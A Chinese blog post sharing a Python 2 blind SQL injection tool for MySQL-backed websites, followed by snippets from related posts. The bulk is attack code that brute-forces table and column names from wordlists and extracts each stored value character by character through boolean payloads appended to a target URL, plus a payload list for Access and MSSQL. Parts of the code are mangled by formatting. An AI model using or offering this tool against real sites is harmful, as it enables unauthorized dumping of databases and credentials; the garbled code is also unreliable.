sql盲注入 python

最新推荐文章于 2025-06-13 10:03:51 发布
最新推荐文章于 2025-06-13 10:03:51 发布
阅读量540 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 总结 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/u014704893/article/details/52751284
本文介绍了如何使用Python编写一个针对MySQL数据库的SQL盲注工具。通过判断表和列是否存在,以及猜测字段长度和ASCII值,该工具能帮助进行安全测试。文章提供了详细的代码示例,并提到了相关网址和命令行选项的使用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

写一款工具,可以用来进行sql盲注
前提: 数据库是mysql

工具中使用的sql语句:
判断表是否存在: (select count(*) from tablename)>0
判断列是否存在:(select count(*) from tablename where 列名=)>0
猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0
(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
用户名长度: and (select count(*) from admin where id=5 and len(username)=4)

密码长度: and (select count(*) from admin where id=5 and len(pws)=4)

关于sql手工注入的网站:blog.youkuaiyun.com/tomatofly/article/details/7221209

代码:`#encoding=utf-8

import requests
import hashlib
import sys
from optparse import OptionParser

class blind(object):
def init(self,url):
self.url=url
self.table=[]
self.column={}
self.value={}

    def get_normal_md5(self,url):
            html=requests.get(url)
            html=html.text
            m=hashlib.md5()
            m.update(html)
            return m.hexdigest()

    def get_table_name(self):
            normal_md5=self.get_normal_md5(self.url)
            table=[i.strip() for i in open('table_name.txt').readlines()]
            url=self.url[:len(self.url)-3]
            for t in table:
                    print 'test table_name is %s'%t
                    temp_url=url+" and (select count(*)  from  "+ t +" )>0 --+"
                    if self.get_normal_md5(temp_url)==normal_md5:
                            self.table.append(t)
    def get_column_name(self,table):
            normal_md5=self.get_normal_md5(self.url)
            column=[i.strip() for i in open('column_name.txt').readlines()]
            url=self.url[:len(self.url)-3]
            column_existence=[]
            for c in column:
                    print 'test %s table column name is  %s' %(table,c)
                    temp_url=url+" and (select count(%s.%s) from %s)>0 --+"%(table,c,table)
                    if self.get_normal_md5(temp_url)==normal_md5:
                            column_existence.append(c)
            self.column[table]=(list(set(column_existence)))

    def get_all_value(self):
            # get  all values save in values
            self.get_table_name()
            for t in self.table:
                    self.get_column_name(t)
            print self.column
            for t in self.table:
                    # get the table have all column length
                    length=-1
                    first=1
                    end=10000
                    mid=(first+end)/2
                    normal_md5=self.get_normal_md5(self.url)
                    url=self.url[:len(self.url)-3]
                    while True:
                            temp_url=url+" and ( select count(*) from %s)=%d --+"%(t,mid)
                            print  temp_url
                            if self.get_normal_md5(temp_url)==normal_md5:
                                    length=mid
                                    break
                            temp_url=url+" and ( select count(*) from %s)>%d --+"%(t,mid)
                            if self.get_normal_md5(temp_url)==normal_md5:
                                    first=mid+1
                                    mid=(end+first)/2
                            else:
                                    end=mid-1
                                    mid=(end+first)/2
            # get the table length
                    if length==-1:
                            pass
                    else:
                            print length
                            v2={}
                            for n in range(length):
                                    v1={}
                                    for c in self.column[t]:
                                            value=self.get_column_value(t,c,n)
                                            v1[c]=value
                                    index_=str(n)
                                    v2[index_]=v1
                            self.value[t]=v2
            self.print_result()
    def print_result(self):
            for i in self.value:
                    print '\n\n',i
                    for index in  self.value[i]:
                            print self.value[i][index]

    def get_column_value(self,table,column,index):
            normal_md5=self.get_normal_md5(self.url)
            url=self.url[:len(self.url)-3]
            # the column value  length is ?????
            value_length=-1
            for i in range(100000):
                    temp_url=url+" and (select LENGTH(%s) from %s limit %d,1)= %d  --+" %(column,table,index,i)
                    if self.get_normal_md5(temp_url)==normal_md5:
                            value_length=i
                            break

            if value_length==-1:
                    return None
            # the column value is ????
            value=""
            for i in range(1,value_length+1):
                    first=1
                    end=127
                    mid=(first+end)/2
                    while True:

                            u=url+" and (select  ASCII(MID((select %s from %s limit %d,1),%d,1)))=%d --+" %(column,table,index,i,mid)
                            print u
                            if self.get_normal_md5(u)==normal_md5:
                                    value+=chr(mid)
                                    break
                            temp_url=url+" and (select  ASCII(MID((select %s from %s limit %d,1),%d,1)))>%d --+" %(column,table,index,i,mid)
                            if self.get_normal_md5(temp_url)==normal_md5:
                                    first=mid+1
                                    mid=(first+end)/2
                            else:
                                    end=mid-1
                                    mid=(first+end)/2
            print value
            return value

def main():
parser=OptionParser()
parser.add_option(“-q”, “–quiet”,
action=”store_false”, dest=”verbose”, default=True,
help=”don’t print status messages to stdout”)
parser.add_option(‘-u’,”–url”,dest=”url”,default=’u’,help=”please input the website url”)
parser.add_option(‘-t’,’–table’,dest=”table”,help=”please input table name”)
parser.add_option(‘-c’,’–column’,dest=”column”,help=”please input column name”)
parser.add_option(“–dump”,dest=”dump”,default=True,help=”blind injection the web site”)
(options, args) = parser.parse_args()

    url=""
    table=""
    column=""
    if options.url=='u':
            print 'you should input the website url'
            sys.exit(0)
    else:
            url=options.url
    a=blind(url)
    if options.table:
            table=options.table
            if options.column:
                    pass
            else:
                    pass
    else:
            a.get_all_value()

if name==’main‘:
main()

在同目录下,必须有column_name.txt table_name.txt
两个文件
USAGE: python get_injection.py -h 查看帮助
对于其中的-u 参数解释: 这里添加的url http://x.x.x.x/index.php?id=1 or 1=1 –+

SQLpython代码
夏炎正好眠
02-13 571
布尔和时间的代码
SQL Injection (Blind) time注入
Appleteachers的博客
04-14 536
python3编写EXP系列 SQL Injection (Blind) time注入 1 简介 DVWA靶场这个是最基础的靶场如果想学习EXP编写这个靶场最好不过,如果能把这个靶场的利用的EXP用python3编写出来这样算是合格的exp入门选手了。 https://github.com/digininja/DVWA 这个系列的第五篇内容这里会学习到如何通过时间注入,获取账号和密码。 就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者
python实现sql
箭雨镜屋
03-01 796
背景介绍 本文这段python代码之前发布在我的博客WebGoat (A1) SQL Injection (advanced)中,用于通过sql布尔获取WebGoat SQL Injection (advanced)第5页的用户tom的密码。 代码比较简单 ,这里单独拎出来主要是为了自己以后查阅方便。如果遇到其他注入问题,可以简单修改headers,payload,以及response.text中检查的内容。如果以后代码有较大改动,便会更新本文。 代码 import requests ur
SQL注入SQL(非常详细)
最新发布
bigbangbangbang1的博客
06-13 1018
我们需要找到一个可能的注入点,如表单字段、URL参数等(可在正常的URL请求中截获信息,然后使用一些注入方式,如:1’ and 1=1 #和1’ and 1=2 #。(有的同仁可能会问这样一个一个的试,如果数据库名称长的话太浪费时间了,有没有简单或者自动化的方式,答案是有的,这是另一个话题,后面我们会详解 一 一介绍。(:计算机中一般以大小写字母、数字、特殊符号来命名,其中为了达到统一的表示方法,ASII统一做了规定,如d对应的十进制是100,具体请查询ASII表。
SQL
kexinxin1的博客
11-24 1201
SQL 问题 SQL,这个词我想大家应该不怎么陌生。如果说实在不知道的话,那么"SQL注入"你一定听说过。这两个词似乎有什么联系,长的跟双胞胎似的?没错,SQL是一种Web系统的安全漏洞,而且是比较严重的那种,它是SQL注入的其中一种方式。也就是说,SQL注入存在很多种方式,而SQL就是其中的一种。 在安全级别中,SQL是一种威胁程度很高的安全漏洞,通过这种方式,可以...
SQLpython脚本自动化注入
菜鸟学安全的博客
12-18 1976
sql无法使用sql语句注入,需要大量的判断语句或者延时注入。这样手动注入方式比较慢,手动发现注入点后可以使用python编写脚本注入
SQL注入——
金色%夕阳的博客
05-27 1584
sql注入—— 1.回顾 回显注入主要应用于数据库中的数据可以再网站的页面上直接展示出来。 报错注入主要应用于网站的页面上存在原始报错信息,数据库中的数据在原始报错信息中展示出 来。也被称为报错回显。 原理:由于用户不可控输入,攻击者可以任意的输入恶意的sql语句,造成sql语义发生改变,从而引起数据库和操作系统的风险。 风险:数据操作、登录绕过、文件操作、命令执行、册表操作。 防御:过滤、预编译。 2.漏洞场景 1.数据库中的数据并不会在页面上直接展示,将查询出的结果通过判断,将判断之后的结果
SQL注入之基于布尔的详解
09-10
布尔型SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
sqlpy:一个试图将 sql 注入登录表单的简短 Python 脚本
07-02
一个超级简单的脚本,用于测/sql 将您的方式注入到网站传递中,该 URL 指向带有登录表单示例的页面: python3.4 ./sqlpy.py ringzer0team.com/challenges/1 ###去做: 注入登录表单以外的地方 添加会话...
sql注入程序(python2.7+pyqt4.8.5)
03-10
2. **注入**:当错误消息不可见时,通过时间延迟或布尔值响应来判断查询结果。 3. **联合查询注入**:插入额外的SQL语句到原始查询中,合并两个查询结果。 4. **堆叠查询注入**:在单个请求中执行多个查询。 5. **...
BSSQLi:自动SQL注入
05-17
**BSSQLi: 自动SQL注入器详解** **一、什么是BSSQLi?** BSSQLi,全称为Blind SQL Injection,是一种自动化的工具,专门用于检测和利用SQL注入漏洞。该工具由Python、Java和Bash三种编程语言实现,提供了跨...
python编写的sql
10-28
python编写的sql
基于pythonsql注入脚本
03-04
适合刚学pythonsql注入的人 import urllib2 import re
Python-Sql检测
weixin_57041250的博客
11-02 284
sql分为布尔型,时间型
python脚本自动化_Python SQL脚本
weixin_42181686的博客
02-11 420
Python SQL脚本2018-11-30268基于布尔#!/usr/bin/env pythonimport requests#dbs#SELECT GROUP_CONCAT(SCHEMA_NAME) FROM information_schema.SCHEMATA#tables#SELECT GROUP_CONCAT(table_NAME) FROM information_sche...
sqlpython脚本
weixin_48266255的博客
08-29 563
【代码】sqlpython脚本。
python mysql脚本
夜班机器人的博客
07-26 2589
某相亲网漏洞,可获得手机号和微信号。 功能1:爬取所有女性ID、年龄、月薪、照片URL 功能2:通过方式获取对应ID的手机号和微信号 功能3:所有数据自动导入MYSQL 缺点:单线程
SQLpython脚本编写
nobugnomoney的博客
05-18 3947
1、什么是 就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为。从 background-1 中,我们可以知道分为三类 基于布尔 SQL 基于时间的 SQL 基于报错的 SQL 0x01.基于布尔 SQL ----------构造逻辑判断 left() :left(a,b)从左侧截取 a 的前 b 位 accii():Ascii()将某个字符转换 为 ascii
sql注入
weixin_64815500的博客
06-19 1917
sql注入关于无回显用到的sqli-labs靶场为例子讲解常用类型以及函数。面试或者打ctf可用作参考
Neutrino面板漏洞分析:SQL注入技术详解
描述中提到的"SQL注入"是SQL注入的一种变体,它不同于常规的SQL注入,攻击者无法直接从错误消息或数据库响应中获取信息。在SQL注入攻击中,攻击者需要通过观察应用程序的行为或者通过一些巧妙的查询来推断数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值